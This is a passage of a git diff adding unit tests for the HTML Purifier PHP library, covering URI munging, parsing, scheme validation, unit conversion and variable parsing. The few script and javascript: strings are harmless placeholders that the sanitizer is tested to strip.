'/r?embeds=&url=http%3A%2F%2Fgoogle.com'); + } + + function testMungeReplaceCSSProperty() { + $this->setMunge('/r?property=%p&url=%s'); + $property = 'background'; + $this->context->register('CurrentCSSProperty', $property); + $this->assertFiltering('http://google.com', '/r?property=background&url=http%3A%2F%2Fgoogle.com'); + } + + function testIgnoreEmbedded() { + $this->setMunge(); + $embeds = true; + $this->context->register('EmbeddedURI', $embeds); + $this->assertFiltering('http://example.com'); + } + + function testProcessEmbedded() { + $this->setMunge(); + $this->config->set('URI.MungeResources', true); + $embeds = true; + $this->context->register('EmbeddedURI', $embeds); + $this->assertFiltering('http://www.example.com/', 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'); + } + + function testPreserveRelative() { + $this->setMunge(); + $this->assertFiltering('index.html'); + } + + function testMungeIgnoreUnknownSchemes() { + $this->setMunge(); + $this->assertFiltering('javascript:foobar();', true); + } + + function testSecureMungePreserve() { + $this->setSecureMunge(); + $this->assertFiltering('/local'); + } + + function testSecureMungePreserveEmbedded() { + $this->setSecureMunge(); + $embedded = true; + $this->context->register('EmbeddedURI', $embedded); + $this->assertFiltering('http://google.com'); + } + + function testSecureMungeStandard() { + $this->setSecureMunge(); + $this->assertFiltering('http://google.com', '/redirect.php?url=http%3A%2F%2Fgoogle.com&checksum=0072e2f817fd2844825def74e54443debecf0892'); + } + + function testSecureMungeIgnoreUnknownSchemes() { + // This should be integration tested as well to be false + $this->setSecureMunge(); + $this->assertFiltering('javascript:', true); + } + + function testSecureMungeIgnoreUnbrowsableSchemes() { + $this->setSecureMunge(); + $this->assertFiltering('news:', true); + } + + function testSecureMungeToDirectory() { + $this->setSecureMunge(); + $this->setMunge('/links/%s/%t'); + $this->assertFiltering('http://google.com', '/links/http%3A%2F%2Fgoogle.com/0072e2f817fd2844825def74e54443debecf0892'); + } + + function testMungeIgnoreSameDomain() { + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('http://example.com/foobar'); + } + + function testMungeIgnoreSameDomainInsecureToSecure() { + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('https://example.com/foobar'); + } + + function testMungeIgnoreSameDomainSecureToSecure() { + $this->config->set('URI.Base', 'https://example.com'); + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('https://example.com/foobar'); + } + + function testMungeSameDomainSecureToInsecure() { + $this->config->set('URI.Base', 'https://example.com'); + $this->setMunge('/%s'); + $this->assertFiltering('http://example.com/foobar', '/http%3A%2F%2Fexample.com%2Ffoobar'); + } + + function testMungeIgnoresSourceHost() { + $this->config->set('URI.Host', 'foo.example.com'); + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('http://foo.example.com/bar'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIFilterHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/URIFilterHarness.php new file mode 100644 index 000000000..165ae6788 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIFilterHarness.php @@ -0,0 +1,15 @@ +<?php + +class HTMLPurifier_URIFilterHarness extends HTMLPurifier_URIHarness +{ + + protected function assertFiltering($uri, $expect_uri = true) { + $this->prepareURI($uri, $expect_uri); + $this->filter->prepare($this->config, $this->context); + $result = $this->filter->filter($uri, $this->config, $this->context); + $this->assertEitherFailOrIdentical($result, $uri, $expect_uri); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/URIHarness.php new file mode 100644 index 000000000..852460a85 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIHarness.php @@ -0,0 +1,31 @@ +<?php + +class HTMLPurifier_URIHarness extends HTMLPurifier_Harness +{ + + /** + * Prepares two URIs into object form + * @param &$uri Reference to string input URI + * @param &$expect_uri Reference to string expectation URI + * @note If $expect_uri is false, it will stay false + */ + protected function prepareURI(&$uri, &$expect_uri) { + $parser = new HTMLPurifier_URIParser(); + if ($expect_uri === true) $expect_uri = $uri; + $uri = $parser->parse($uri); + if ($expect_uri !== false) { + $expect_uri = $parser->parse($expect_uri); + } + } + + /** + * Generates a URI object from the corresponding string + */ + protected function createURI($uri) { + $parser = new HTMLPurifier_URIParser(); + return $parser->parse($uri); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URIParserTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URIParserTest.php new file mode 100644 index 000000000..5cb5850f7 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URIParserTest.php @@ -0,0 +1,145 @@ +<?php + +class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness +{ + + protected function assertParsing( + $uri, $scheme, $userinfo, $host, $port, $path, $query, $fragment, $config = null, $context = null + ) { + $this->prepareCommon($config, $context); + $parser = new HTMLPurifier_URIParser(); + $result = $parser->parse($uri, $config, $context); + $expect = new HTMLPurifier_URI($scheme, $userinfo, $host, $port, $path, $query, $fragment); + $this->assertEqual($result, $expect); + } + + function testPercentNormalization() { + $this->assertParsing( + '%G', + null, null, null, null, '%25G', null, null + ); + } + + function testRegular() { + $this->assertParsing( + 'http://www.example.com/webhp?q=foo#result2', + 'http', null, 'www.example.com', null, '/webhp', 'q=foo', 'result2' + ); + } + + function testPortAndUsername() { + $this->assertParsing( + 'http://user@authority.part:80/now/the/path?query#fragment', + 'http', 'user', 'authority.part', 80, '/now/the/path', 'query', 'fragment' + ); + } + + function testPercentEncoding() { + $this->assertParsing( + 'http://en.wikipedia.org/wiki/Clich%C3%A9', + 'http', null, 'en.wikipedia.org', null, '/wiki/Clich%C3%A9', null, null + ); + } + + function testEmptyQuery() { + $this->assertParsing( + 'http://www.example.com/?#', + 'http', null, 'www.example.com', null, '/', '', null + ); + } + + function testEmptyPath() { + $this->assertParsing( + 'http://www.example.com', + 'http', null, 'www.example.com', null, '', null, null + ); + } + + function testOpaqueURI() { + $this->assertParsing( + 'mailto:bob@example.com', + 'mailto', null, null, null, 'bob@example.com', null, null + ); + } + + function testIPv4Address() { + $this->assertParsing( + 'http://192.0.34.166/', + 'http', null, '192.0.34.166', null, '/', null, null + ); + } + + function testFakeIPv4Address() { + $this->assertParsing( + 'http://333.123.32.123/', + 'http', null, '333.123.32.123', null, '/', null, null + ); + } + + function testIPv6Address() { + $this->assertParsing( + 'http://[2001:db8::7]/c=GB?objectClass?one', + 'http', null, '[2001:db8::7]', null, '/c=GB', 'objectClass?one', null + ); + } + + function testInternationalizedDomainName() { + $this->assertParsing( + "http://t\xC5\xABdali\xC5\x86.lv", + 'http', null, "t\xC5\xABdali\xC5\x86.lv", null, '', null, null + ); + } + + function testInvalidPort() { + $this->assertParsing( + 'http://example.com:foobar', + 'http', null, 'example.com', null, '', null, null + ); + } + + function testPathAbsolute() { + $this->assertParsing( + 'http:/this/is/path', + 'http', null, null, null, '/this/is/path', null, null + ); + } + + function testPathRootless() { + // this should not be used but is allowed + $this->assertParsing( + 'http:this/is/path', + 'http', null, null, null, 'this/is/path', null, null + ); + } + + function testPathEmpty() { + $this->assertParsing( + 'http:', + 'http', null, null, null, '', null, null + ); + } + + function testRelativeURI() { + $this->assertParsing( + '/a/b', + null, null, null, null, '/a/b', null, null + ); + } + + function testMalformedTag() { + $this->assertParsing( + 'http://www.example.com/>', + 'http', null, 'www.example.com', null, '/', null, null + ); + } + + function testEmpty() { + $this->assertParsing( + '', + null, null, null, null, '', null, null + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URISchemeRegistryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URISchemeRegistryTest.php new file mode 100644 index 000000000..e124aa18d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URISchemeRegistryTest.php @@ -0,0 +1,49 @@ +<?php + +class HTMLPurifier_URISchemeRegistryTest extends HTMLPurifier_Harness +{ + + function test() { + + generate_mock_once('HTMLPurifier_URIScheme'); + + $config = HTMLPurifier_Config::create(array( + 'URI.AllowedSchemes' => 'http, telnet', + 'URI.OverrideAllowedSchemes' => true + )); + $context = new HTMLPurifier_Context(); + + $registry = new HTMLPurifier_URISchemeRegistry(); + $this->assertIsA($registry->getScheme('http', $config, $context), 'HTMLPurifier_URIScheme_http'); + + $scheme_http = new HTMLPurifier_URISchemeMock(); + $scheme_telnet = new HTMLPurifier_URISchemeMock(); + $scheme_foobar = new HTMLPurifier_URISchemeMock(); + + // register a new scheme + $registry->register('telnet', $scheme_telnet); + $this->assertIdentical($registry->getScheme('telnet', $config, $context), $scheme_telnet); + + // overload a scheme, this is FINAL (forget about defaults) + $registry->register('http', $scheme_http); + $this->assertIdentical($registry->getScheme('http', $config, $context), $scheme_http); + + // when we register a scheme, it's automatically allowed + $registry->register('foobar', $scheme_foobar); + $this->assertIdentical($registry->getScheme('foobar', $config, $context), $scheme_foobar); + + // now, test when overriding is not allowed + $config = HTMLPurifier_Config::create(array( + 'URI.AllowedSchemes' => 'http, telnet', + 'URI.OverrideAllowedSchemes' => false + )); + $this->assertNull($registry->getScheme('foobar', $config, $context)); + + // scheme not allowed and never registered + $this->assertNull($registry->getScheme('ftp', $config, $context)); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URISchemeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/URISchemeTest.php new file mode 100644 index 000000000..4b43310bb --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URISchemeTest.php @@ -0,0 +1,188 @@ +<?php + +// WARNING: All the URI schemes are far to relaxed, we need to tighten +// the checks. + +class HTMLPurifier_URISchemeTest extends HTMLPurifier_URIHarness +{ + + private $pngBase64; + + public function __construct() { + $this->pngBase64 = + 'iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAABGdBTUEAALGP'. + 'C/xhBQAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9YGARc5KB0XV+IA'. + 'AAAddEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIFRoZSBHSU1Q72QlbgAAAF1J'. + 'REFUGNO9zL0NglAAxPEfdLTs4BZM4DIO4C7OwQg2JoQ9LE1exdlYvBBeZ7jq'. + 'ch9//q1uH4TLzw4d6+ErXMMcXuHWxId3KOETnnXXV6MJpcq2MLaI97CER3N0'. + 'vr4MkhoXe0rZigAAAABJRU5ErkJggg=='; + } + + protected function assertValidation($uri, $expect_uri = true) { + $this->prepareURI($uri, $expect_uri); + $this->config->set('URI.AllowedSchemes', array($uri->scheme)); + // convenience hack: the scheme should be explicitly specified + $scheme = $uri->getSchemeObj($this->config, $this->context); + $result = $scheme->validate($uri, $this->config, $this->context); + $this->assertEitherFailOrIdentical($result, $uri, $expect_uri); + } + + function test_http_regular() { + $this->assertValidation( + 'http://example.com/?s=q#fragment' + ); + } + + function test_http_removeDefaultPort() { + $this->assertValidation( + 'http://example.com:80', + 'http://example.com' + ); + } + + function test_http_removeUserInfo() { + $this->assertValidation( + 'http://bob@example.com', + 'http://example.com' + ); + } + + function test_http_preserveNonDefaultPort() { + $this->assertValidation( + 'http://example.com:8080' + ); + } + + function test_https_regular() { + $this->assertValidation( + 'https://user@example.com:443/?s=q#frag', + 'https://example.com/?s=q#frag' + ); + } + + function test_ftp_regular() { + $this->assertValidation( + 'ftp://user@example.com/path' + ); + } + + function test_ftp_removeDefaultPort() { + $this->assertValidation( + 'ftp://example.com:21', + 'ftp://example.com' + ); + } + + function test_ftp_removeQueryString() { + $this->assertValidation( + 'ftp://example.com?s=q', + 'ftp://example.com' + ); + } + + function test_ftp_preserveValidTypecode() { + $this->assertValidation( + 'ftp://example.com/file.txt;type=a' + ); + } + + function test_ftp_removeInvalidTypecode() { + $this->assertValidation( + 'ftp://example.com/file.txt;type=z', + 'ftp://example.com/file.txt' + ); + } + + function test_ftp_encodeExtraSemicolons() { + $this->assertValidation( + 'ftp://example.com/too;many;semicolons=1', + 'ftp://example.com/too%3Bmany%3Bsemicolons=1' + ); + } + + function test_news_regular() { + $this->assertValidation( + 'news:gmane.science.linguistics' + ); + } + + function test_news_explicit() { + $this->assertValidation( + 'news:642@eagle.ATT.COM' + ); + } + + function test_news_removeNonPathComponents() { + $this->assertValidation( + 'news://user@example.com:80/rec.music?path=foo#frag', + 'news:/rec.music#frag' + ); + } + + function test_nntp_regular() { + $this->assertValidation( + 'nntp://news.example.com/alt.misc/42#frag' + ); + } + + function test_nntp_removalOfRedundantOrUselessComponents() { + $this->assertValidation( + 'nntp://user@news.example.com:119/alt.misc/42?s=q#frag', + 'nntp://news.example.com/alt.misc/42#frag' + ); + } + + function test_mailto_regular() { + $this->assertValidation( + 'mailto:bob@example.com' + ); + } + + function test_mailto_removalOfRedundantOrUselessComponents() { + $this->assertValidation( + 'mailto://user@example.com:80/bob@example.com?subject=Foo#frag', + 'mailto:/bob@example.com?subject=Foo#frag' + ); + } + + function test_data_png() { + $this->assertValidation( + 'data:image/png;base64,'.$this->pngBase64 + ); + } + + function test_data_malformed() { + $this->assertValidation( + 'data:image/png;base64,vr4MkhoXJRU5ErkJggg==', + false + ); + } + + function test_data_implicit() { + $this->assertValidation( + 'data:base64,'.$this->pngBase64, + 'data:image/png;base64,'.$this->pngBase64 + ); + } + + function test_file_basic() { + $this->assertValidation( + 'file://user@MYCOMPUTER:12/foo/bar?baz#frag', + 'file://MYCOMPUTER/foo/bar#frag' + ); + } + + function test_file_local() { + $this->assertValidation( + 'file:///foo/bar?baz#frag', + 'file:///foo/bar#frag' + ); + } + + function test_ftp_empty_host() { + $this->assertValidation('ftp:///example.com', false); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/URITest.php b/lib/htmlpurifier/tests/HTMLPurifier/URITest.php new file mode 100644 index 000000000..02b950133 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/URITest.php @@ -0,0 +1,201 @@ +<?php + +class HTMLPurifier_URITest extends HTMLPurifier_URIHarness +{ + + protected function createURI($uri) { + $parser = new HTMLPurifier_URIParser(); + return $parser->parse($uri); + } + + function test_construct() { + $uri1 = new HTMLPurifier_URI('HTTP', 'bob', 'example.com', '23', '/foo', 'bar=2', 'slash'); + $uri2 = new HTMLPurifier_URI('http', 'bob', 'example.com', 23, '/foo', 'bar=2', 'slash'); + $this->assertIdentical($uri1, $uri2); + } + + protected $oldRegistry; + + protected function &setUpSchemeRegistryMock() { + $this->oldRegistry = HTMLPurifier_URISchemeRegistry::instance(); + generate_mock_once('HTMLPurifier_URIScheme'); + generate_mock_once('HTMLPurifier_URISchemeRegistry'); + $registry = HTMLPurifier_URISchemeRegistry::instance( + new HTMLPurifier_URISchemeRegistryMock() + ); + return $registry; + } + + protected function setUpSchemeMock($name) { + $registry = $this->setUpSchemeRegistryMock(); + $scheme_mock = new HTMLPurifier_URISchemeMock(); + $registry->setReturnValue('getScheme', $scheme_mock, array($name, '*', '*')); + return $scheme_mock; + } + + protected function setUpNoValidSchemes() { + $registry = $this->setUpSchemeRegistryMock(); + $registry->setReturnValue('getScheme', false, array('*', '*', '*')); + } + + protected function tearDownSchemeRegistryMock() { + HTMLPurifier_URISchemeRegistry::instance($this->oldRegistry); + } + + function test_getSchemeObj() { + $scheme_mock = $this->setUpSchemeMock('http'); + + $uri = $this->createURI('http:'); + $scheme_obj = $uri->getSchemeObj($this->config, $this->context); + $this->assertIdentical($scheme_obj, $scheme_mock); + + $this->tearDownSchemeRegistryMock(); + } + + function test_getSchemeObj_invalidScheme() { + $this->setUpNoValidSchemes(); + + $uri = $this->createURI('http:'); + $result = $uri->getSchemeObj($this->config, $this->context); + $this->assertIdentical($result, false); + + $this->tearDownSchemeRegistryMock(); + } + + function test_getSchemaObj_defaultScheme() { + $scheme = 'foobar'; + + $scheme_mock = $this->setUpSchemeMock($scheme); + $this->config->set('URI.DefaultScheme', $scheme); + + $uri = $this->createURI('hmm'); + $scheme_obj = $uri->getSchemeObj($this->config, $this->context); + $this->assertIdentical($scheme_obj, $scheme_mock); + + $this->tearDownSchemeRegistryMock(); + } + + function test_getSchemaObj_invalidDefaultScheme() { + $this->setUpNoValidSchemes(); + $this->config->set('URI.DefaultScheme', 'foobar'); + + $uri = $this->createURI('hmm'); + + $this->expectError('Default scheme object "foobar" was not readable'); + $result = $uri->getSchemeObj($this->config, $this->context); + $this->assertIdentical($result, false); + + $this->tearDownSchemeRegistryMock(); + } + + protected function assertToString($expect_uri, $scheme, $userinfo, $host, $port, $path, $query, $fragment) { + $uri = new HTMLPurifier_URI($scheme, $userinfo, $host, $port, $path, $query, $fragment); + $string = $uri->toString(); + $this->assertIdentical($string, $expect_uri); + } + + function test_toString_full() { + $this->assertToString( + 'http://bob@example.com:300/foo?bar=baz#fragment', + 'http', 'bob', 'example.com', 300, '/foo', 'bar=baz', 'fragment' + ); + } + + function test_toString_scheme() { + $this->assertToString( + 'http:', + 'http', null, null, null, '', null, null + ); + } + + function test_toString_authority() { + $this->assertToString( + '//bob@example.com:8080', + null, 'bob', 'example.com', 8080, '', null, null + ); + } + + function test_toString_path() { + $this->assertToString( + '/path/to', + null, null, null, null, '/path/to', null, null + ); + } + + function test_toString_query() { + $this->assertToString( + '?q=string', + null, null, null, null, '', 'q=string', null + ); + } + + function test_toString_fragment() { + $this->assertToString( + '#fragment', + null, null, null, null, '', null, 'fragment' + ); + } + + protected function assertValidation($uri, $expect_uri = true) { + if ($expect_uri === true) $expect_uri = $uri; + $uri = $this->createURI($uri); + $result = $uri->validate($this->config, $this->context); + if ($expect_uri === false) { + $this->assertFalse($result); + } else { + $this->assertTrue($result); + $this->assertIdentical($uri->toString(), $expect_uri); + } + } + + function test_validate_overlongPort() { + $this->assertValidation('http://example.com:65536', 'http://example.com'); + } + + function test_validate_zeroPort() { + $this->assertValidation('http://example.com:00', 'http://example.com'); + } + + function test_validate_invalidHostThatLooksLikeIPv6() { + $this->assertValidation('http://[2001:0db8:85z3:08d3:1319:8a2e:0370:7334]', ''); + } + + function test_validate_removeRedundantScheme() { + $this->assertValidation('http:foo:/:', 'foo%3A/:'); + } + + function test_validate_username() { + $this->assertValidation("http://user\xE3\x91\x94:@foo.com", 'http://user%E3%91%94:@foo.com'); + } + + function test_validate_path_abempty() { + $this->assertValidation("http://host/\xE3\x91\x94:", 'http://host/%E3%91%94:'); + } + + function test_validate_path_absolute() { + $this->assertValidation("/\xE3\x91\x94:", '/%E3%91%94:'); + } + + function test_validate_path_rootless() { + $this->assertValidation("mailto:\xE3\x91\x94:", 'mailto:%E3%91%94:'); + } + + function test_validate_path_noscheme() { + $this->assertValidation("\xE3\x91\x94", '%E3%91%94'); + } + + function test_validate_query() { + $this->assertValidation("?/\xE3\x91\x94", '?/%E3%91%94'); + } + + function test_validate_fragment() { + $this->assertValidation("#/\xE3\x91\x94", '#/%E3%91%94'); + } + + function test_validate_path_empty() { + $this->assertValidation('http://google.com'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/UnitConverterTest.php b/lib/htmlpurifier/tests/HTMLPurifier/UnitConverterTest.php new file mode 100644 index 000000000..3dc1e2afa --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/UnitConverterTest.php @@ -0,0 +1,131 @@ +<?php + +class HTMLPurifier_UnitConverterTest extends HTMLPurifier_Harness +{ + + protected function assertConversion($input, $expect, $unit = null, $test_negative = true) { + $length = HTMLPurifier_Length::make($input); + if ($expect !== false) $expectl = HTMLPurifier_Length::make($expect); + else $expectl = false; + $to_unit = $unit !== null ? $unit : $expectl->getUnit(); + + $converter = new HTMLPurifier_UnitConverter(4, 10); + $result = $converter->convert($length, $to_unit); + if (!$result || !$expectl) $this->assertIdentical($result, $expectl); + else $this->assertIdentical($result->toString(), $expectl->toString()); + + $converter = new HTMLPurifier_UnitConverter(4, 10, true); + $result = $converter->convert($length, $to_unit); + if (!$result || !$expectl) $this->assertIdentical($result, $expectl); + else $this->assertIdentical($result->toString(), $expectl->toString(), 'BCMath substitute: %s'); + + if ($test_negative) { + $this->assertConversion( + "-$input", + $expect === false ? false : "-$expect", + $unit, + false + ); + } + } + + function testFail() { + $this->assertConversion('1in', false, 'foo'); + $this->assertConversion('1foo', false, 'in'); + } + + function testZero() { + $this->assertConversion('0', '0', 'in', false); + $this->assertConversion('-0', '0', 'in', false); + $this->assertConversion('0in', '0', 'in', false); + $this->assertConversion('-0in', '0', 'in', false); + $this->assertConversion('0in', '0', 'pt', false); + $this->assertConversion('-0in', '0', 'pt', false); + } + + function testEnglish() { + $this->assertConversion('1in', '6pc'); + $this->assertConversion('6pc', '1in'); + + $this->assertConversion('1in', '72pt'); + $this->assertConversion('72pt', '1in'); + + $this->assertConversion('1pc', '12pt'); + $this->assertConversion('12pt', '1pc'); + + $this->assertConversion('1pt', '0.01389in'); + $this->assertConversion('1.000pt', '0.01389in'); + $this->assertConversion('100000pt', '1389in'); + + $this->assertConversion('1in', '96px'); + $this->assertConversion('96px', '1in'); + } + + function testMetric() { + $this->assertConversion('1cm', '10mm'); + $this->assertConversion('10mm', '1cm'); + $this->assertConversion('1mm', '0.1cm'); + $this->assertConversion('100mm', '10cm'); + } + + function testEnglishMetric() { + $this->assertConversion('2.835pt', '1mm'); + $this->assertConversion('1mm', '2.835pt'); + $this->assertConversion('0.3937in', '1cm'); + } + + function testRoundingMinPrecision() { + // One sig-fig, modified to be four, conversion rounds up + $this->assertConversion('100pt', '1.389in'); + $this->assertConversion('1000pt', '13.89in'); + $this->assertConversion('10000pt', '138.9in'); + $this->assertConversion('100000pt', '1389in'); + $this->assertConversion('1000000pt', '13890in'); + } + + function testRoundingUserPrecision() { + // Five sig-figs, conversion rounds down + $this->assertConversion('11112000pt', '154330in'); + $this->assertConversion('1111200pt', '15433in'); + $this->assertConversion('111120pt', '1543.3in'); + $this->assertConversion('11112pt', '154.33in'); + $this->assertConversion('1111.2pt', '15.433in'); + $this->assertConversion('111.12pt', '1.5433in'); + $this->assertConversion('11.112pt', '0.15433in'); + } + + function testRoundingBigNumber() { + $this->assertConversion('444400000000000000000000in', '42660000000000000000000000px'); + } + + protected function assertSigFig($n, $sigfigs) { + $converter = new HTMLPurifier_UnitConverter(); + $result = $converter->getSigFigs($n); + $this->assertIdentical($result, $sigfigs); + } + + function test_getSigFigs() { + $this->assertSigFig('0', 0); + $this->assertSigFig('1', 1); + $this->assertSigFig('-1', 1); + $this->assertSigFig('+1', 1); + $this->assertSigFig('01', 1); + $this->assertSigFig('001', 1); + $this->assertSigFig('12', 2); + $this->assertSigFig('012', 2); + $this->assertSigFig('10', 1); + $this->assertSigFig('10.', 2); + $this->assertSigFig('100.', 3); + $this->assertSigFig('103', 3); + $this->assertSigFig('130', 2); + $this->assertSigFig('.1', 1); + $this->assertSigFig('0.1', 1); + $this->assertSigFig('00.1', 1); + $this->assertSigFig('0.01', 1); + $this->assertSigFig('0.010', 2); + $this->assertSigFig('0.012', 2); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/VarParser/FlexibleTest.php b/lib/htmlpurifier/tests/HTMLPurifier/VarParser/FlexibleTest.php new file mode 100644 index 000000000..c6149b6b4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/VarParser/FlexibleTest.php @@ -0,0 +1,66 @@ +<?php + +class HTMLPurifier_VarParser_FlexibleTest extends HTMLPurifier_VarParserHarness +{ + + function testValidate() { + + $this->assertValid('foobar', 'string'); + $this->assertValid('foobar', 'text'); + $this->assertValid('FOOBAR', 'istring', 'foobar'); + $this->assertValid('FOOBAR', 'itext', 'foobar'); + + $this->assertValid(34, 'int'); + + $this->assertValid(3.34, 'float'); + + $this->assertValid(false, 'bool'); + $this->assertValid(0, 'bool', false); + $this->assertValid(1, 'bool', true); + $this->assertValid('true', 'bool', true); + $this->assertValid('false', 'bool', false); + $this->assertValid('1', 'bool', true); + $this->assertInvalid(34, 'bool'); + $this->assertInvalid(null, 'bool'); + + $this->assertValid(array('1', '2', '3'), 'list'); + $this->assertValid('foo,bar, cow', 'list', array('foo', 'bar', 'cow')); + $this->assertValid('', 'list', array()); + $this->assertValid("foo\nbar", 'list', array('foo', 'bar')); + $this->assertValid("foo\nbar,baz", 'list', array('foo', 'bar', 'baz')); + + $this->assertValid(array('1' => true, '2' => true), 'lookup'); + $this->assertValid(array('1', '2'), 'lookup', array('1' => true, '2' => true)); + $this->assertValid('foo,bar', 'lookup', array('foo' => true, 'bar' => true)); + $this->assertValid("foo\nbar", 'lookup', array('foo' => true, 'bar' => true)); + $this->assertValid("foo\nbar,baz", 'lookup', array('foo' => true, 'bar' => true, 'baz' => true)); + $this->assertValid('', 'lookup', array()); + $this->assertValid(array(), 'lookup'); + + $this->assertValid(array('foo' => 'bar'), 'hash'); + $this->assertValid(array(1 => 'moo'), 'hash'); + $this->assertInvalid(array(0 => 'moo'), 'hash'); + $this->assertValid('', 'hash', array()); + $this->assertValid('foo:bar,too:two', 'hash', array('foo' => 'bar', 'too' => 'two')); + $this->assertValid("foo:bar\ntoo:two,three:free", 'hash', array('foo' => 'bar', 'too' => 'two', 'three' => 'free')); + $this->assertValid('foo:bar,too', 'hash', array('foo' => 'bar')); + $this->assertValid('foo:bar,', 'hash', array('foo' => 'bar')); + $this->assertValid('foo:bar:baz', 'hash', array('foo' => 'bar:baz')); + + $this->assertValid(23, 'mixed'); + + } + + function testValidate_withMagicNumbers() { + $this->assertValid('foobar', HTMLPurifier_VarParser::STRING); + } + + function testValidate_null() { + $this->assertIdentical($this->parser->parse(null, 'string', true), null); + $this->expectException('HTMLPurifier_VarParserException'); + $this->parser->parse(null, 'string', false); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/VarParser/NativeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/VarParser/NativeTest.php new file mode 100644 index 000000000..424dceb75 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/VarParser/NativeTest.php @@ -0,0 +1,12 @@ +<?php + +class HTMLPurifier_VarParser_NativeTest extends HTMLPurifier_VarParserHarness +{ + + public function testValidateSimple() { + $this->assertValid('"foo\\\\"', 'string', 'foo\\'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/VarParserHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/VarParserHarness.php new file mode 100644 index 000000000..0ef23189c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/VarParserHarness.php @@ -0,0 +1,33 @@ +<?php + +class HTMLPurifier_VarParserHarness extends UnitTestCase +{ + + protected $parser; + + public function setup() { + $class = substr(get_class($this), 0, -4); + $this->parser = new $class(); + } + + function assertValid($var, $type, $ret = null) { + $ret = ($ret === null) ? $var : $ret; + $this->assertIdentical($this->parser->parse($var, $type), $ret); + } + + function assertInvalid($var, $type, $msg = null) { + $caught = false; + try { + $this->parser->parse($var, $type); + } catch (HTMLPurifier_VarParserException $e) { + $caught = true; + if ($msg !== null) $this->assertIdentical($e->getMessage(), $msg); + } + if (!$caught) { + $this->fail('Did not catch expected error'); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifierTest.php b/lib/htmlpurifier/tests/HTMLPurifierTest.php new file mode 100644 index 000000000..4fe8f0680 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifierTest.php @@ -0,0 +1,50 @@ +<?php + +class HTMLPurifierTest extends HTMLPurifier_Harness +{ + protected $purifier; + + function testNull() { + $this->assertPurification("Null byte\0", "Null byte"); + } + + function test_purifyArray() { + + $this->assertIdentical( + $this->purifier->purifyArray( + array('Good', '<b>Sketchy', 'foo' => '<script>bad</script>') + ), + array('Good', '<b>Sketchy</b>', 'foo' => '') + ); + + $this->assertIsA($this->purifier->context, 'array'); + + } + + function testGetInstance() { + $purifier = HTMLPurifier::getInstance(); + $purifier2 = HTMLPurifier::getInstance(); + $this->assertReference($purifier, $purifier2); + } + + function testMakeAbsolute() { + $this->config->set('URI.Base', 'http://example.com/bar/baz.php'); + $this->config->set('URI.MakeAbsolute', true); + $this->assertPurification( + '<a href="foo.txt">Foobar</a>', + '<a href="http://example.com/bar/foo.txt">Foobar</a>' + ); + } + + function test_addFilter_deprecated() { + $this->expectError('HTMLPurifier->addFilter() is deprecated, use configuration directives in the Filter namespace or Filter.Custom'); + generate_mock_once('HTMLPurifier_Filter'); + $this->purifier->addFilter($mock = new HTMLPurifier_FilterMock()); + $mock->expectOnce('preFilter'); + $mock->expectOnce('postFilter'); + $this->purifier->purify('foo'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/PHPT/Controller/SimpleTest.php b/lib/htmlpurifier/tests/PHPT/Controller/SimpleTest.php new file mode 100644 index 000000000..62fe6a405 --- /dev/null +++ b/lib/htmlpurifier/tests/PHPT/Controller/SimpleTest.php @@ -0,0 +1,24 @@ +<?php + +/** + * Controller for PHPT that implements the SimpleTest unit-testing interface. + */ +class PHPT_Controller_SimpleTest extends SimpleTestCase +{ + + protected $_path; + + public function __construct($path) { + $this->_path = $path; + parent::__construct($path); + } + + public function testPhpt() { + $suite = new PHPT_Suite(array($this->_path)); + $phpt_reporter = new PHPT_Reporter_SimpleTest($this->reporter); + $suite->run($phpt_reporter); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/PHPT/Reporter/SimpleTest.php b/lib/htmlpurifier/tests/PHPT/Reporter/SimpleTest.php new file mode 100644 index 000000000..25ffe7b4c --- /dev/null +++ 